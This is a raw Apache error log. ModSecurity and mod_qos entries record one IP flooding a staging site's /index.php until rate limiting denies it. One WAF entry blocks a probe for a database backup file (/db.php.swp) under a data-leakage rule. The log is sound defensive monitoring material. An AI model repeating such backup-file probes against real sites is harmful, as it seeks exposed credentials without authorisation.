[Tue May 26 19:54:23.306683 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IFgAAAcs"]
[Tue May 26 19:54:23.312504 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7iwAAALE"]
[Tue May 26 19:54:23.314330 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IEQAAAbY"]
[Tue May 26 19:54:23.320890 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25ICQAAAfU"]
[Tue May 26 19:54:23.321637 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7hQAAAKw"]
[Tue May 26 19:54:23.334539 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7egAAAKQ"]
[Tue May 26 19:54:23.343402 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IEgAAAbw"]
[Tue May 26 19:54:23.366604 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7lAAAAMk"]
[Tue May 26 19:54:23.369455 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7kAAAAL4"]
[Tue May 26 19:54:23.369978 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7hwAAAO0"]
[Tue May 26 19:54:23.370478 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7iAAAAL8"]
[Tue May 26 19:54:23.377957 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IHgAAAZI"]
[Tue May 26 19:54:23.385894 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPvwAAADU"]
[Tue May 26 19:54:23.391873 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPuQAAAHc"]
[Tue May 26 19:54:23.407864 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IIAAAAfI"]
[Tue May 26 19:54:23.407911 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPwAAAAF0"]
[Tue May 26 19:54:23.416949 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7kQAAALs"]
[Tue May 26 19:54:23.421611 2026] [security2:error] [pid 93576:tid 93779] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszP2AAAAEM"]
[Tue May 26 19:54:23.422747 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IHwAAAY8"]
[Tue May 26 19:54:23.436143 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K74AAAAPw"]
[Tue May 26 19:54:23.440894 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IJgAAAgw"]
[Tue May 26 19:54:23.447099 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPwQAAAAE"]
[Tue May 26 19:54:23.453403 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPvgAAAGk"]
[Tue May 26 19:54:23.464970 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPxwAAAGw"]
[Tue May 26 19:54:23.468025 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K76gAAAMc"]
[Tue May 26 19:54:23.560463 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP7AAAAHU
[Tue May 26 19:54:23.562465 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8hQAAAM4
[Tue May 26 19:54:23.566229 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP7QAAAG8
[Tue May 26 19:54:23.574405 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8hgAAANo
[Tue May 26 19:54:23.589579 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8hwAAAQI
[Tue May 26 19:54:23.593179 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8iAAAAMc
[Tue May 26 19:54:23.601030 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8iQAAAL8
[Tue May 26 19:54:23.608888 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP7gAAAAI
[Tue May 26 19:54:23.620530 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8jQAAAMA
[Tue May 26 19:54:23.621515 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8jgAAAKo
[Tue May 26 19:54:23.712718 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8kAAAAQI
[Tue May 26 19:54:23.716795 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP7wAAAEg
[Tue May 26 19:54:23.719564 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP8AAAACo
[Tue May 26 19:54:23.729769 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8kgAAAKg
[Tue May 26 19:54:23.742401 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8kwAAANw
[Tue May 26 19:54:23.745406 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8lQAAAMw
[Tue May 26 19:54:23.752598 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8lgAAAJ8
[Tue May 26 19:54:23.766549 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP8gAAABE
[Tue May 26 19:54:23.772676 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8lwAAANc
[Tue May 26 19:54:23.772813 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8mAAAAL8
[Tue May 26 19:54:23.865467 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8mgAAAKo
[Tue May 26 19:54:23.869771 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP8wAAACs
[Tue May 26 19:54:23.871467 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP9AAAABk
[Tue May 26 19:54:23.880716 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8mwAAAM4
[Tue May 26 19:54:23.895474 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8nAAAANo
[Tue May 26 19:54:23.897959 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8nQAAAQI
[Tue May 26 19:54:23.904207 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8ngAAAKg
[Tue May 26 19:54:23.922839 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP9QAAAHk
[Tue May 26 19:54:23.923809 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8nwAAAMw
[Tue May 26 19:54:23.924361 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8oAAAAJ8
[Tue May 26 19:54:24.018012 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8ogAAAKo
[Tue May 26 19:54:24.019679 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP9gAAAAs
[Tue May 26 19:54:24.021843 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP9wAAAG0
[Tue May 26 19:54:24.033470 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8owAAAM4
[Tue May 26 19:54:24.047762 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8pAAAANo
[Tue May 26 19:54:24.051526 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8pQAAAQI
[Tue May 26 19:54:24.057515 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8pgAAAKg
[Tue May 26 19:54:24.074632 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8pwAAAOc
[Tue May 26 19:54:24.076431 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP-AAAAF4
[Tue May 26 19:54:24.076607 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8qAAAANU
[Tue May 26 19:54:24.126509 2026] [security2:error] [pid 86490:tid 86646] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db.php.swp"] [unique_id "ahWtGFZMwN0DpLVWo6K8qQAAAJ8"]
[Tue May 26 19:54:24.168400 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP-QAAAE0
[Tue May 26 19:54:24.169579 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8qgAAANo
[Tue May 26 19:54:24.175744 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP-gAAAHY
[Tue May 26 19:54:24.187258 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8rAAAAQI
[Tue May 26 19:54:24.200360 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8rQAAAKg
[Tue May 26 19:54:24.203920 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8rgAAAOc
[Tue May 26 19:54:24.219425 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8rwAAANU
[Tue May 26 19:54:24.226710 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8sAAAAIc
[Tue May 26 19:54:24.229227 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGFZMwN0DpLVWo6K8sQAAAMs
[Tue May 26 19:54:24.230275 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGGDRMqfxdEDkoszP-wAAAAo
[Tue May 26 19:54:24.275517 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPwgAAAHE"]
[Tue May 26 19:54:24.284277 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K70QAAAI8"]
[Tue May 26 19:54:24.284424 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K72gAAAIY"]
[Tue May 26 19:54:24.289915 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IJQAAAaE"]
[Tue May 26 19:54:24.299748 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K76wAAAJU"]
[Tue May 26 19:54:24.312365 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K77AAAAIw"]
[Tue May 26 19:54:24.313174 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFmDRMqfxdEDkoszPxgAAABY"]
[Tue May 26 19:54:24.315231 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K7_AAAAIg"]
[Tue May 26 19:54:24.316041 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFkqK9k_ZUB2Vp25IJAAAAdg"]
[Tue May 26 19:54:24.321370 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtF2DRMqfxdEDkoszP3gAAAFo"]
[Tue May 26 19:54:24.323244 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K7-wAAAJQ"]
[Tue May 26 19:54:24.325777 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K78QAAAOI"]
[Tue May 26 19:54:24.327999 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K77wAAAKI"]
[Tue May 26 19:54:24.352138 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFlZMwN0DpLVWo6K8AAAAAJk"]
